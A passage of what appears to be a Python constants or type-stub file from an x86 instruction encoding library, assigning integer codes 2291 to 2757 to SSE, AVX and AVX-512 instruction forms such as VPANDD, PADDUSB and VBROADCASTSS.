EVEX_VPANDD_YMM_K1Z_YMM_YMMM256B32: int = 2291
EVEX_VPANDD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2292
EVEX_VPANDQ_XMM_K1Z_XMM_XMMM128B64: int = 2293
EVEX_VPANDQ_YMM_K1Z_YMM_YMMM256B64: int = 2294
EVEX_VPANDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2295
PADDUSB_MM_MMM64: int = 2296
PADDUSB_XMM_XMMM128: int = 2297
VEX_VPADDUSB_XMM_XMM_XMMM128: int = 2298
VEX_VPADDUSB_YMM_YMM_YMMM256: int = 2299
EVEX_VPADDUSB_XMM_K1Z_XMM_XMMM128: int = 2300
EVEX_VPADDUSB_YMM_K1Z_YMM_YMMM256: int = 2301
EVEX_VPADDUSB_ZMM_K1Z_ZMM_ZMMM512: int = 2302
PADDUSW_MM_MMM64: int = 2303
PADDUSW_XMM_XMMM128: int = 2304
VEX_VPADDUSW_XMM_XMM_XMMM128: int = 2305
VEX_VPADDUSW_YMM_YMM_YMMM256: int = 2306
EVEX_VPADDUSW_XMM_K1Z_XMM_XMMM128: int = 2307
EVEX_VPADDUSW_YMM_K1Z_YMM_YMMM256: int = 2308
EVEX_VPADDUSW_ZMM_K1Z_ZMM_ZMMM512: int = 2309
PMAXUB_MM_MMM64: int = 2310
PMAXUB_XMM_XMMM128: int = 2311
VEX_VPMAXUB_XMM_XMM_XMMM128: int = 2312
VEX_VPMAXUB_YMM_YMM_YMMM256: int = 2313
EVEX_VPMAXUB_XMM_K1Z_XMM_XMMM128: int = 2314
EVEX_VPMAXUB_YMM_K1Z_YMM_YMMM256: int = 2315
EVEX_VPMAXUB_ZMM_K1Z_ZMM_ZMMM512: int = 2316
PANDN_MM_MMM64: int = 2317
PANDN_XMM_XMMM128: int = 2318
VEX_VPANDN_XMM_XMM_XMMM128: int = 2319
VEX_VPANDN_YMM_YMM_YMMM256: int = 2320
EVEX_VPANDND_XMM_K1Z_XMM_XMMM128B32: int = 2321
EVEX_VPANDND_YMM_K1Z_YMM_YMMM256B32: int = 2322
EVEX_VPANDND_ZMM_K1Z_ZMM_ZMMM512B32: int = 2323
EVEX_VPANDNQ_XMM_K1Z_XMM_XMMM128B64: int = 2324
EVEX_VPANDNQ_YMM_K1Z_YMM_YMMM256B64: int = 2325
EVEX_VPANDNQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2326
PAVGB_MM_MMM64: int = 2327
PAVGB_XMM_XMMM128: int = 2328
VEX_VPAVGB_XMM_XMM_XMMM128: int = 2329
VEX_VPAVGB_YMM_YMM_YMMM256: int = 2330
EVEX_VPAVGB_XMM_K1Z_XMM_XMMM128: int = 2331
EVEX_VPAVGB_YMM_K1Z_YMM_YMMM256: int = 2332
EVEX_VPAVGB_ZMM_K1Z_ZMM_ZMMM512: int = 2333
PSRAW_MM_MMM64: int = 2334
PSRAW_XMM_XMMM128: int = 2335
VEX_VPSRAW_XMM_XMM_XMMM128: int = 2336
VEX_VPSRAW_YMM_YMM_XMMM128: int = 2337
EVEX_VPSRAW_XMM_K1Z_XMM_XMMM128: int = 2338
EVEX_VPSRAW_YMM_K1Z_YMM_XMMM128: int = 2339
EVEX_VPSRAW_ZMM_K1Z_ZMM_XMMM128: int = 2340
PSRAD_MM_MMM64: int = 2341
PSRAD_XMM_XMMM128: int = 2342
VEX_VPSRAD_XMM_XMM_XMMM128: int = 2343
VEX_VPSRAD_YMM_YMM_XMMM128: int = 2344
EVEX_VPSRAD_XMM_K1Z_XMM_XMMM128: int = 2345
EVEX_VPSRAD_YMM_K1Z_YMM_XMMM128: int = 2346
EVEX_VPSRAD_ZMM_K1Z_ZMM_XMMM128: int = 2347
EVEX_VPSRAQ_XMM_K1Z_XMM_XMMM128: int = 2348
EVEX_VPSRAQ_YMM_K1Z_YMM_XMMM128: int = 2349
EVEX_VPSRAQ_ZMM_K1Z_ZMM_XMMM128: int = 2350
PAVGW_MM_MMM64: int = 2351
PAVGW_XMM_XMMM128: int = 2352
VEX_VPAVGW_XMM_XMM_XMMM128: int = 2353
VEX_VPAVGW_YMM_YMM_YMMM256: int = 2354
EVEX_VPAVGW_XMM_K1Z_XMM_XMMM128: int = 2355
EVEX_VPAVGW_YMM_K1Z_YMM_YMMM256: int = 2356
EVEX_VPAVGW_ZMM_K1Z_ZMM_ZMMM512: int = 2357
PMULHUW_MM_MMM64: int = 2358
PMULHUW_XMM_XMMM128: int = 2359
VEX_VPMULHUW_XMM_XMM_XMMM128: int = 2360
VEX_VPMULHUW_YMM_YMM_YMMM256: int = 2361
EVEX_VPMULHUW_XMM_K1Z_XMM_XMMM128: int = 2362
EVEX_VPMULHUW_YMM_K1Z_YMM_YMMM256: int = 2363
EVEX_VPMULHUW_ZMM_K1Z_ZMM_ZMMM512: int = 2364
PMULHW_MM_MMM64: int = 2365
PMULHW_XMM_XMMM128: int = 2366
VEX_VPMULHW_XMM_XMM_XMMM128: int = 2367
VEX_VPMULHW_YMM_YMM_YMMM256: int = 2368
EVEX_VPMULHW_XMM_K1Z_XMM_XMMM128: int = 2369
EVEX_VPMULHW_YMM_K1Z_YMM_YMMM256: int = 2370
EVEX_VPMULHW_ZMM_K1Z_ZMM_ZMMM512: int = 2371
CVTTPD2DQ_XMM_XMMM128: int = 2372
VEX_VCVTTPD2DQ_XMM_XMMM128: int = 2373
VEX_VCVTTPD2DQ_XMM_YMMM256: int = 2374
EVEX_VCVTTPD2DQ_XMM_K1Z_XMMM128B64: int = 2375
EVEX_VCVTTPD2DQ_XMM_K1Z_YMMM256B64: int = 2376
EVEX_VCVTTPD2DQ_YMM_K1Z_ZMMM512B64_SAE: int = 2377
CVTDQ2PD_XMM_XMMM64: int = 2378
VEX_VCVTDQ2PD_XMM_XMMM64: int = 2379
VEX_VCVTDQ2PD_YMM_XMMM128: int = 2380
EVEX_VCVTDQ2PD_XMM_K1Z_XMMM64B32: int = 2381
EVEX_VCVTDQ2PD_YMM_K1Z_XMMM128B32: int = 2382
EVEX_VCVTDQ2PD_ZMM_K1Z_YMMM256B32_ER: int = 2383
EVEX_VCVTQQ2PD_XMM_K1Z_XMMM128B64: int = 2384
EVEX_VCVTQQ2PD_YMM_K1Z_YMMM256B64: int = 2385
EVEX_VCVTQQ2PD_ZMM_K1Z_ZMMM512B64_ER: int = 2386
CVTPD2DQ_XMM_XMMM128: int = 2387
VEX_VCVTPD2DQ_XMM_XMMM128: int = 2388
VEX_VCVTPD2DQ_XMM_YMMM256: int = 2389
EVEX_VCVTPD2DQ_XMM_K1Z_XMMM128B64: int = 2390
EVEX_VCVTPD2DQ_XMM_K1Z_YMMM256B64: int = 2391
EVEX_VCVTPD2DQ_YMM_K1Z_ZMMM512B64_ER: int = 2392
MOVNTQ_M64_MM: int = 2393
MOVNTDQ_M128_XMM: int = 2394
VEX_VMOVNTDQ_M128_XMM: int = 2395
VEX_VMOVNTDQ_M256_YMM: int = 2396
EVEX_VMOVNTDQ_M128_XMM: int = 2397
EVEX_VMOVNTDQ_M256_YMM: int = 2398
EVEX_VMOVNTDQ_M512_ZMM: int = 2399
PSUBSB_MM_MMM64: int = 2400
PSUBSB_XMM_XMMM128: int = 2401
VEX_VPSUBSB_XMM_XMM_XMMM128: int = 2402
VEX_VPSUBSB_YMM_YMM_YMMM256: int = 2403
EVEX_VPSUBSB_XMM_K1Z_XMM_XMMM128: int = 2404
EVEX_VPSUBSB_YMM_K1Z_YMM_YMMM256: int = 2405
EVEX_VPSUBSB_ZMM_K1Z_ZMM_ZMMM512: int = 2406
PSUBSW_MM_MMM64: int = 2407
PSUBSW_XMM_XMMM128: int = 2408
VEX_VPSUBSW_XMM_XMM_XMMM128: int = 2409
VEX_VPSUBSW_YMM_YMM_YMMM256: int = 2410
EVEX_VPSUBSW_XMM_K1Z_XMM_XMMM128: int = 2411
EVEX_VPSUBSW_YMM_K1Z_YMM_YMMM256: int = 2412
EVEX_VPSUBSW_ZMM_K1Z_ZMM_ZMMM512: int = 2413
PMINSW_MM_MMM64: int = 2414
PMINSW_XMM_XMMM128: int = 2415
VEX_VPMINSW_XMM_XMM_XMMM128: int = 2416
VEX_VPMINSW_YMM_YMM_YMMM256: int = 2417
EVEX_VPMINSW_XMM_K1Z_XMM_XMMM128: int = 2418
EVEX_VPMINSW_YMM_K1Z_YMM_YMMM256: int = 2419
EVEX_VPMINSW_ZMM_K1Z_ZMM_ZMMM512: int = 2420
POR_MM_MMM64: int = 2421
POR_XMM_XMMM128: int = 2422
VEX_VPOR_XMM_XMM_XMMM128: int = 2423
VEX_VPOR_YMM_YMM_YMMM256: int = 2424
EVEX_VPORD_XMM_K1Z_XMM_XMMM128B32: int = 2425
EVEX_VPORD_YMM_K1Z_YMM_YMMM256B32: int = 2426
EVEX_VPORD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2427
EVEX_VPORQ_XMM_K1Z_XMM_XMMM128B64: int = 2428
EVEX_VPORQ_YMM_K1Z_YMM_YMMM256B64: int = 2429
EVEX_VPORQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2430
PADDSB_MM_MMM64: int = 2431
PADDSB_XMM_XMMM128: int = 2432
VEX_VPADDSB_XMM_XMM_XMMM128: int = 2433
VEX_VPADDSB_YMM_YMM_YMMM256: int = 2434
EVEX_VPADDSB_XMM_K1Z_XMM_XMMM128: int = 2435
EVEX_VPADDSB_YMM_K1Z_YMM_YMMM256: int = 2436
EVEX_VPADDSB_ZMM_K1Z_ZMM_ZMMM512: int = 2437
PADDSW_MM_MMM64: int = 2438
PADDSW_XMM_XMMM128: int = 2439
VEX_VPADDSW_XMM_XMM_XMMM128: int = 2440
VEX_VPADDSW_YMM_YMM_YMMM256: int = 2441
EVEX_VPADDSW_XMM_K1Z_XMM_XMMM128: int = 2442
EVEX_VPADDSW_YMM_K1Z_YMM_YMMM256: int = 2443
EVEX_VPADDSW_ZMM_K1Z_ZMM_ZMMM512: int = 2444
PMAXSW_MM_MMM64: int = 2445
PMAXSW_XMM_XMMM128: int = 2446
VEX_VPMAXSW_XMM_XMM_XMMM128: int = 2447
VEX_VPMAXSW_YMM_YMM_YMMM256: int = 2448
EVEX_VPMAXSW_XMM_K1Z_XMM_XMMM128: int = 2449
EVEX_VPMAXSW_YMM_K1Z_YMM_YMMM256: int = 2450
EVEX_VPMAXSW_ZMM_K1Z_ZMM_ZMMM512: int = 2451
PXOR_MM_MMM64: int = 2452
PXOR_XMM_XMMM128: int = 2453
VEX_VPXOR_XMM_XMM_XMMM128: int = 2454
VEX_VPXOR_YMM_YMM_YMMM256: int = 2455
EVEX_VPXORD_XMM_K1Z_XMM_XMMM128B32: int = 2456
EVEX_VPXORD_YMM_K1Z_YMM_YMMM256B32: int = 2457
EVEX_VPXORD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2458
EVEX_VPXORQ_XMM_K1Z_XMM_XMMM128B64: int = 2459
EVEX_VPXORQ_YMM_K1Z_YMM_YMMM256B64: int = 2460
EVEX_VPXORQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2461
LDDQU_XMM_M128: int = 2462
VEX_VLDDQU_XMM_M128: int = 2463
VEX_VLDDQU_YMM_M256: int = 2464
PSLLW_MM_MMM64: int = 2465
PSLLW_XMM_XMMM128: int = 2466
VEX_VPSLLW_XMM_XMM_XMMM128: int = 2467
VEX_VPSLLW_YMM_YMM_XMMM128: int = 2468
EVEX_VPSLLW_XMM_K1Z_XMM_XMMM128: int = 2469
EVEX_VPSLLW_YMM_K1Z_YMM_XMMM128: int = 2470
EVEX_VPSLLW_ZMM_K1Z_ZMM_XMMM128: int = 2471
PSLLD_MM_MMM64: int = 2472
PSLLD_XMM_XMMM128: int = 2473
VEX_VPSLLD_XMM_XMM_XMMM128: int = 2474
VEX_VPSLLD_YMM_YMM_XMMM128: int = 2475
EVEX_VPSLLD_XMM_K1Z_XMM_XMMM128: int = 2476
EVEX_VPSLLD_YMM_K1Z_YMM_XMMM128: int = 2477
EVEX_VPSLLD_ZMM_K1Z_ZMM_XMMM128: int = 2478
PSLLQ_MM_MMM64: int = 2479
PSLLQ_XMM_XMMM128: int = 2480
VEX_VPSLLQ_XMM_XMM_XMMM128: int = 2481
VEX_VPSLLQ_YMM_YMM_XMMM128: int = 2482
EVEX_VPSLLQ_XMM_K1Z_XMM_XMMM128: int = 2483
EVEX_VPSLLQ_YMM_K1Z_YMM_XMMM128: int = 2484
EVEX_VPSLLQ_ZMM_K1Z_ZMM_XMMM128: int = 2485
PMULUDQ_MM_MMM64: int = 2486
PMULUDQ_XMM_XMMM128: int = 2487
VEX_VPMULUDQ_XMM_XMM_XMMM128: int = 2488
VEX_VPMULUDQ_YMM_YMM_YMMM256: int = 2489
EVEX_VPMULUDQ_XMM_K1Z_XMM_XMMM128B64: int = 2490
EVEX_VPMULUDQ_YMM_K1Z_YMM_YMMM256B64: int = 2491
EVEX_VPMULUDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2492
PMADDWD_MM_MMM64: int = 2493
PMADDWD_XMM_XMMM128: int = 2494
VEX_VPMADDWD_XMM_XMM_XMMM128: int = 2495
VEX_VPMADDWD_YMM_YMM_YMMM256: int = 2496
EVEX_VPMADDWD_XMM_K1Z_XMM_XMMM128: int = 2497
EVEX_VPMADDWD_YMM_K1Z_YMM_YMMM256: int = 2498
EVEX_VPMADDWD_ZMM_K1Z_ZMM_ZMMM512: int = 2499
PSADBW_MM_MMM64: int = 2500
PSADBW_XMM_XMMM128: int = 2501
VEX_VPSADBW_XMM_XMM_XMMM128: int = 2502
VEX_VPSADBW_YMM_YMM_YMMM256: int = 2503
EVEX_VPSADBW_XMM_XMM_XMMM128: int = 2504
EVEX_VPSADBW_YMM_YMM_YMMM256: int = 2505
EVEX_VPSADBW_ZMM_ZMM_ZMMM512: int = 2506
MASKMOVQ_RDI_MM_MM: int = 2507
MASKMOVDQU_RDI_XMM_XMM: int = 2508
VEX_VMASKMOVDQU_RDI_XMM_XMM: int = 2509
PSUBB_MM_MMM64: int = 2510
PSUBB_XMM_XMMM128: int = 2511
VEX_VPSUBB_XMM_XMM_XMMM128: int = 2512
VEX_VPSUBB_YMM_YMM_YMMM256: int = 2513
EVEX_VPSUBB_XMM_K1Z_XMM_XMMM128: int = 2514
EVEX_VPSUBB_YMM_K1Z_YMM_YMMM256: int = 2515
EVEX_VPSUBB_ZMM_K1Z_ZMM_ZMMM512: int = 2516
PSUBW_MM_MMM64: int = 2517
PSUBW_XMM_XMMM128: int = 2518
VEX_VPSUBW_XMM_XMM_XMMM128: int = 2519
VEX_VPSUBW_YMM_YMM_YMMM256: int = 2520
EVEX_VPSUBW_XMM_K1Z_XMM_XMMM128: int = 2521
EVEX_VPSUBW_YMM_K1Z_YMM_YMMM256: int = 2522
EVEX_VPSUBW_ZMM_K1Z_ZMM_ZMMM512: int = 2523
PSUBD_MM_MMM64: int = 2524
PSUBD_XMM_XMMM128: int = 2525
VEX_VPSUBD_XMM_XMM_XMMM128: int = 2526
VEX_VPSUBD_YMM_YMM_YMMM256: int = 2527
EVEX_VPSUBD_XMM_K1Z_XMM_XMMM128B32: int = 2528
EVEX_VPSUBD_YMM_K1Z_YMM_YMMM256B32: int = 2529
EVEX_VPSUBD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2530
PSUBQ_MM_MMM64: int = 2531
PSUBQ_XMM_XMMM128: int = 2532
VEX_VPSUBQ_XMM_XMM_XMMM128: int = 2533
VEX_VPSUBQ_YMM_YMM_YMMM256: int = 2534
EVEX_VPSUBQ_XMM_K1Z_XMM_XMMM128B64: int = 2535
EVEX_VPSUBQ_YMM_K1Z_YMM_YMMM256B64: int = 2536
EVEX_VPSUBQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2537
PADDB_MM_MMM64: int = 2538
PADDB_XMM_XMMM128: int = 2539
VEX_VPADDB_XMM_XMM_XMMM128: int = 2540
VEX_VPADDB_YMM_YMM_YMMM256: int = 2541
EVEX_VPADDB_XMM_K1Z_XMM_XMMM128: int = 2542
EVEX_VPADDB_YMM_K1Z_YMM_YMMM256: int = 2543
EVEX_VPADDB_ZMM_K1Z_ZMM_ZMMM512: int = 2544
PADDW_MM_MMM64: int = 2545
PADDW_XMM_XMMM128: int = 2546
VEX_VPADDW_XMM_XMM_XMMM128: int = 2547
VEX_VPADDW_YMM_YMM_YMMM256: int = 2548
EVEX_VPADDW_XMM_K1Z_XMM_XMMM128: int = 2549
EVEX_VPADDW_YMM_K1Z_YMM_YMMM256: int = 2550
EVEX_VPADDW_ZMM_K1Z_ZMM_ZMMM512: int = 2551
PADDD_MM_MMM64: int = 2552
PADDD_XMM_XMMM128: int = 2553
VEX_VPADDD_XMM_XMM_XMMM128: int = 2554
VEX_VPADDD_YMM_YMM_YMMM256: int = 2555
EVEX_VPADDD_XMM_K1Z_XMM_XMMM128B32: int = 2556
EVEX_VPADDD_YMM_K1Z_YMM_YMMM256B32: int = 2557
EVEX_VPADDD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2558
UD0_R16_RM16: int = 2559
UD0_R32_RM32: int = 2560
UD0_R64_RM64: int = 2561
PSHUFB_MM_MMM64: int = 2562
PSHUFB_XMM_XMMM128: int = 2563
VEX_VPSHUFB_XMM_XMM_XMMM128: int = 2564
VEX_VPSHUFB_YMM_YMM_YMMM256: int = 2565
EVEX_VPSHUFB_XMM_K1Z_XMM_XMMM128: int = 2566
EVEX_VPSHUFB_YMM_K1Z_YMM_YMMM256: int = 2567
EVEX_VPSHUFB_ZMM_K1Z_ZMM_ZMMM512: int = 2568
PHADDW_MM_MMM64: int = 2569
PHADDW_XMM_XMMM128: int = 2570
VEX_VPHADDW_XMM_XMM_XMMM128: int = 2571
VEX_VPHADDW_YMM_YMM_YMMM256: int = 2572
PHADDD_MM_MMM64: int = 2573
PHADDD_XMM_XMMM128: int = 2574
VEX_VPHADDD_XMM_XMM_XMMM128: int = 2575
VEX_VPHADDD_YMM_YMM_YMMM256: int = 2576
PHADDSW_MM_MMM64: int = 2577
PHADDSW_XMM_XMMM128: int = 2578
VEX_VPHADDSW_XMM_XMM_XMMM128: int = 2579
VEX_VPHADDSW_YMM_YMM_YMMM256: int = 2580
PMADDUBSW_MM_MMM64: int = 2581
PMADDUBSW_XMM_XMMM128: int = 2582
VEX_VPMADDUBSW_XMM_XMM_XMMM128: int = 2583
VEX_VPMADDUBSW_YMM_YMM_YMMM256: int = 2584
EVEX_VPMADDUBSW_XMM_K1Z_XMM_XMMM128: int = 2585
EVEX_VPMADDUBSW_YMM_K1Z_YMM_YMMM256: int = 2586
EVEX_VPMADDUBSW_ZMM_K1Z_ZMM_ZMMM512: int = 2587
PHSUBW_MM_MMM64: int = 2588
PHSUBW_XMM_XMMM128: int = 2589
VEX_VPHSUBW_XMM_XMM_XMMM128: int = 2590
VEX_VPHSUBW_YMM_YMM_YMMM256: int = 2591
PHSUBD_MM_MMM64: int = 2592
PHSUBD_XMM_XMMM128: int = 2593
VEX_VPHSUBD_XMM_XMM_XMMM128: int = 2594
VEX_VPHSUBD_YMM_YMM_YMMM256: int = 2595
PHSUBSW_MM_MMM64: int = 2596
PHSUBSW_XMM_XMMM128: int = 2597
VEX_VPHSUBSW_XMM_XMM_XMMM128: int = 2598
VEX_VPHSUBSW_YMM_YMM_YMMM256: int = 2599
PSIGNB_MM_MMM64: int = 2600
PSIGNB_XMM_XMMM128: int = 2601
VEX_VPSIGNB_XMM_XMM_XMMM128: int = 2602
VEX_VPSIGNB_YMM_YMM_YMMM256: int = 2603
PSIGNW_MM_MMM64: int = 2604
PSIGNW_XMM_XMMM128: int = 2605
VEX_VPSIGNW_XMM_XMM_XMMM128: int = 2606
VEX_VPSIGNW_YMM_YMM_YMMM256: int = 2607
PSIGND_MM_MMM64: int = 2608
PSIGND_XMM_XMMM128: int = 2609
VEX_VPSIGND_XMM_XMM_XMMM128: int = 2610
VEX_VPSIGND_YMM_YMM_YMMM256: int = 2611
PMULHRSW_MM_MMM64: int = 2612
PMULHRSW_XMM_XMMM128: int = 2613
VEX_VPMULHRSW_XMM_XMM_XMMM128: int = 2614
VEX_VPMULHRSW_YMM_YMM_YMMM256: int = 2615
EVEX_VPMULHRSW_XMM_K1Z_XMM_XMMM128: int = 2616
EVEX_VPMULHRSW_YMM_K1Z_YMM_YMMM256: int = 2617
EVEX_VPMULHRSW_ZMM_K1Z_ZMM_ZMMM512: int = 2618
VEX_VPERMILPS_XMM_XMM_XMMM128: int = 2619
VEX_VPERMILPS_YMM_YMM_YMMM256: int = 2620
EVEX_VPERMILPS_XMM_K1Z_XMM_XMMM128B32: int = 2621
EVEX_VPERMILPS_YMM_K1Z_YMM_YMMM256B32: int = 2622
EVEX_VPERMILPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 2623
VEX_VPERMILPD_XMM_XMM_XMMM128: int = 2624
VEX_VPERMILPD_YMM_YMM_YMMM256: int = 2625
EVEX_VPERMILPD_XMM_K1Z_XMM_XMMM128B64: int = 2626
EVEX_VPERMILPD_YMM_K1Z_YMM_YMMM256B64: int = 2627
EVEX_VPERMILPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 2628
VEX_VTESTPS_XMM_XMMM128: int = 2629
VEX_VTESTPS_YMM_YMMM256: int = 2630
VEX_VTESTPD_XMM_XMMM128: int = 2631
VEX_VTESTPD_YMM_YMMM256: int = 2632
PBLENDVB_XMM_XMMM128: int = 2633
EVEX_VPSRLVW_XMM_K1Z_XMM_XMMM128: int = 2634
EVEX_VPSRLVW_YMM_K1Z_YMM_YMMM256: int = 2635
EVEX_VPSRLVW_ZMM_K1Z_ZMM_ZMMM512: int = 2636
EVEX_VPMOVUSWB_XMMM64_K1Z_XMM: int = 2637
EVEX_VPMOVUSWB_XMMM128_K1Z_YMM: int = 2638
EVEX_VPMOVUSWB_YMMM256_K1Z_ZMM: int = 2639
EVEX_VPSRAVW_XMM_K1Z_XMM_XMMM128: int = 2640
EVEX_VPSRAVW_YMM_K1Z_YMM_YMMM256: int = 2641
EVEX_VPSRAVW_ZMM_K1Z_ZMM_ZMMM512: int = 2642
EVEX_VPMOVUSDB_XMMM32_K1Z_XMM: int = 2643
EVEX_VPMOVUSDB_XMMM64_K1Z_YMM: int = 2644
EVEX_VPMOVUSDB_XMMM128_K1Z_ZMM: int = 2645
EVEX_VPSLLVW_XMM_K1Z_XMM_XMMM128: int = 2646
EVEX_VPSLLVW_YMM_K1Z_YMM_YMMM256: int = 2647
EVEX_VPSLLVW_ZMM_K1Z_ZMM_ZMMM512: int = 2648
EVEX_VPMOVUSQB_XMMM16_K1Z_XMM: int = 2649
EVEX_VPMOVUSQB_XMMM32_K1Z_YMM: int = 2650
EVEX_VPMOVUSQB_XMMM64_K1Z_ZMM: int = 2651
VEX_VCVTPH2PS_XMM_XMMM64: int = 2652
VEX_VCVTPH2PS_YMM_XMMM128: int = 2653
EVEX_VCVTPH2PS_XMM_K1Z_XMMM64: int = 2654
EVEX_VCVTPH2PS_YMM_K1Z_XMMM128: int = 2655
EVEX_VCVTPH2PS_ZMM_K1Z_YMMM256_SAE: int = 2656
EVEX_VPMOVUSDW_XMMM64_K1Z_XMM: int = 2657
EVEX_VPMOVUSDW_XMMM128_K1Z_YMM: int = 2658
EVEX_VPMOVUSDW_YMMM256_K1Z_ZMM: int = 2659
BLENDVPS_XMM_XMMM128: int = 2660
EVEX_VPRORVD_XMM_K1Z_XMM_XMMM128B32: int = 2661
EVEX_VPRORVD_YMM_K1Z_YMM_YMMM256B32: int = 2662
EVEX_VPRORVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2663
EVEX_VPRORVQ_XMM_K1Z_XMM_XMMM128B64: int = 2664
EVEX_VPRORVQ_YMM_K1Z_YMM_YMMM256B64: int = 2665
EVEX_VPRORVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2666
EVEX_VPMOVUSQW_XMMM32_K1Z_XMM: int = 2667
EVEX_VPMOVUSQW_XMMM64_K1Z_YMM: int = 2668
EVEX_VPMOVUSQW_XMMM128_K1Z_ZMM: int = 2669
BLENDVPD_XMM_XMMM128: int = 2670
EVEX_VPROLVD_XMM_K1Z_XMM_XMMM128B32: int = 2671
EVEX_VPROLVD_YMM_K1Z_YMM_YMMM256B32: int = 2672
EVEX_VPROLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2673
EVEX_VPROLVQ_XMM_K1Z_XMM_XMMM128B64: int = 2674
EVEX_VPROLVQ_YMM_K1Z_YMM_YMMM256B64: int = 2675
EVEX_VPROLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2676
EVEX_VPMOVUSQD_XMMM64_K1Z_XMM: int = 2677
EVEX_VPMOVUSQD_XMMM128_K1Z_YMM: int = 2678
EVEX_VPMOVUSQD_YMMM256_K1Z_ZMM: int = 2679
VEX_VPERMPS_YMM_YMM_YMMM256: int = 2680
EVEX_VPERMPS_YMM_K1Z_YMM_YMMM256B32: int = 2681
EVEX_VPERMPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 2682
EVEX_VPERMPD_YMM_K1Z_YMM_YMMM256B64: int = 2683
EVEX_VPERMPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 2684
PTEST_XMM_XMMM128: int = 2685
VEX_VPTEST_XMM_XMMM128: int = 2686
VEX_VPTEST_YMM_YMMM256: int = 2687
VEX_VBROADCASTSS_XMM_M32: int = 2688
VEX_VBROADCASTSS_YMM_M32: int = 2689
EVEX_VBROADCASTSS_XMM_K1Z_XMMM32: int = 2690
EVEX_VBROADCASTSS_YMM_K1Z_XMMM32: int = 2691
EVEX_VBROADCASTSS_ZMM_K1Z_XMMM32: int = 2692
VEX_VBROADCASTSD_YMM_M64: int = 2693
EVEX_VBROADCASTF32X2_YMM_K1Z_XMMM64: int = 2694
EVEX_VBROADCASTF32X2_ZMM_K1Z_XMMM64: int = 2695
EVEX_VBROADCASTSD_YMM_K1Z_XMMM64: int = 2696
EVEX_VBROADCASTSD_ZMM_K1Z_XMMM64: int = 2697
VEX_VBROADCASTF128_YMM_M128: int = 2698
EVEX_VBROADCASTF32X4_YMM_K1Z_M128: int = 2699
EVEX_VBROADCASTF32X4_ZMM_K1Z_M128: int = 2700
EVEX_VBROADCASTF64X2_YMM_K1Z_M128: int = 2701
EVEX_VBROADCASTF64X2_ZMM_K1Z_M128: int = 2702
EVEX_VBROADCASTF32X8_ZMM_K1Z_M256: int = 2703
EVEX_VBROADCASTF64X4_ZMM_K1Z_M256: int = 2704
PABSB_MM_MMM64: int = 2705
PABSB_XMM_XMMM128: int = 2706
VEX_VPABSB_XMM_XMMM128: int = 2707
VEX_VPABSB_YMM_YMMM256: int = 2708
EVEX_VPABSB_XMM_K1Z_XMMM128: int = 2709
EVEX_VPABSB_YMM_K1Z_YMMM256: int = 2710
EVEX_VPABSB_ZMM_K1Z_ZMMM512: int = 2711
PABSW_MM_MMM64: int = 2712
PABSW_XMM_XMMM128: int = 2713
VEX_VPABSW_XMM_XMMM128: int = 2714
VEX_VPABSW_YMM_YMMM256: int = 2715
EVEX_VPABSW_XMM_K1Z_XMMM128: int = 2716
EVEX_VPABSW_YMM_K1Z_YMMM256: int = 2717
EVEX_VPABSW_ZMM_K1Z_ZMMM512: int = 2718
PABSD_MM_MMM64: int = 2719
PABSD_XMM_XMMM128: int = 2720
VEX_VPABSD_XMM_XMMM128: int = 2721
VEX_VPABSD_YMM_YMMM256: int = 2722
EVEX_VPABSD_XMM_K1Z_XMMM128B32: int = 2723
EVEX_VPABSD_YMM_K1Z_YMMM256B32: int = 2724
EVEX_VPABSD_ZMM_K1Z_ZMMM512B32: int = 2725
EVEX_VPABSQ_XMM_K1Z_XMMM128B64: int = 2726
EVEX_VPABSQ_YMM_K1Z_YMMM256B64: int = 2727
EVEX_VPABSQ_ZMM_K1Z_ZMMM512B64: int = 2728
PMOVSXBW_XMM_XMMM64: int = 2729
VEX_VPMOVSXBW_XMM_XMMM64: int = 2730
VEX_VPMOVSXBW_YMM_XMMM128: int = 2731
EVEX_VPMOVSXBW_XMM_K1Z_XMMM64: int = 2732
EVEX_VPMOVSXBW_YMM_K1Z_XMMM128: int = 2733
EVEX_VPMOVSXBW_ZMM_K1Z_YMMM256: int = 2734
EVEX_VPMOVSWB_XMMM64_K1Z_XMM: int = 2735
EVEX_VPMOVSWB_XMMM128_K1Z_YMM: int = 2736
EVEX_VPMOVSWB_YMMM256_K1Z_ZMM: int = 2737
PMOVSXBD_XMM_XMMM32: int = 2738
VEX_VPMOVSXBD_XMM_XMMM32: int = 2739
VEX_VPMOVSXBD_YMM_XMMM64: int = 2740
EVEX_VPMOVSXBD_XMM_K1Z_XMMM32: int = 2741
EVEX_VPMOVSXBD_YMM_K1Z_XMMM64: int = 2742
EVEX_VPMOVSXBD_ZMM_K1Z_XMMM128: int = 2743
EVEX_VPMOVSDB_XMMM32_K1Z_XMM: int = 2744
EVEX_VPMOVSDB_XMMM64_K1Z_YMM: int = 2745
EVEX_VPMOVSDB_XMMM128_K1Z_ZMM: int = 2746
PMOVSXBQ_XMM_XMMM16: int = 2747
VEX_VPMOVSXBQ_XMM_XMMM16: int = 2748
VEX_VPMOVSXBQ_YMM_XMMM32: int = 2749
EVEX_VPMOVSXBQ_XMM_K1Z_XMMM16: int = 2750
EVEX_VPMOVSXBQ_YMM_K1Z_XMMM32: int = 2751
EVEX_VPMOVSXBQ_ZMM_K1Z_XMMM64: int = 2752
EVEX_VPMOVSQB_XMMM16_K1Z_XMM: int = 2753
EVEX_VPMOVSQB_XMMM32_K1Z_YMM: int = 2754
EVEX_VPMOVSQB_XMMM64_K1Z_ZMM: int = 2755
PMOVSXWD_XMM_XMMM64: int = 2756
VEX_VPMOVSXWD_XMM_XMMM64: int = 2757
